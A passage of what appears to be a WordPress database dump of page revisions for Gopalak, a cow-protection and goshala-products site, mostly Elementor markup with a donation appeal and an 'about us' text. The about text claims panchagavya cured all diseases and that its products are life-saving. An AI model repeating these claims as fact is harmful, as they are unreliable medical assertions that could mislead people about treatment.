svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 12:30:52','2022-10-28 07:00:52','',1816,'https://gopalak.in/?p=2018',0,'revision','',0),(2019,1,'2022-10-28 12:30:52','2022-10-28 07:00:52','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"1263\" height=\"500\" src=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 12:30:52','2022-10-28 07:00:52','',1816,'https://gopalak.in/?p=2019',0,'revision','',0),(2020,1,'2022-10-28 12:36:32','2022-10-28 07:06:32','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>													<a href=\"https://gopalak.in/\">\n							<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />								</a>\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n															<img width=\"5052\" height=\"1664\" src=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55.png 5052w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-300x99.png 300w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1024x337.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-768x253.png 768w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-1536x506.png 1536w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-2048x675.png 2048w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-50x16.png 50w, https://gopalak.in/wp-content/uploads/2022/10/GOPALAK55-48x16.png 48w\" sizes=\"(max-width: 5052px) 100vw, 5052px\" />															\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being.</p><p>All things needed were produced in every village and this was possible only because of the GAUMAATA. Not only cow dung / cow urine based farming was done even all the diseases were cured by Panchgavyas received by Cows. Our GAUMAATA was the basis of a healthy, prosperous, happy and wealthy BHARAT. Gradually we were attacked by foreigners, our culture became distorted, large companies controlled the economy and the economy became centralized. Entrapped in the propaganda propagated by the big companies, we started chemical based agriculture &amp; left natural agriculture and also we forgot the remaining utility of the holy cow, whereas there is no such thing of our basic requirement which can not be fulfilled by the holy cow. In today’s scenario, there are many researches have been done on the cow Gavyas and from these researches it has been proven that cow is a special gift of God to humanity. Even today, there are many people who cultivate not only cow based agriculture but also they produce panchagavya based special products to share importance of holy cow in society. These products are not only over-effective but also these have the life saving property. The only problem is that people who are doing such excellent work for society do not have a market and because of their inability to advertise/marketing, they are not able to reach people even people want these best products</p><p>We also want to establish a market for such people who are continuously doing work hard to save GAUMAATA, they produce Panchgavya products and do poison free farming. We are committed to create a platform for such people who are producing best quality products to make poison free society and also doing commendable work to save the nation’s culture and civilization. Our only aim is to re-organize the cow based economy which will be governed by the villages &amp; villagers, because as long as this system was in the country, the country was called gold’s sparrow and today, where we have reached in the lack of this system, it is not hidden from anyone. In short, We want to make a poison free, healthy, happy, prosperous, wealthy and powerful nation.</p>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			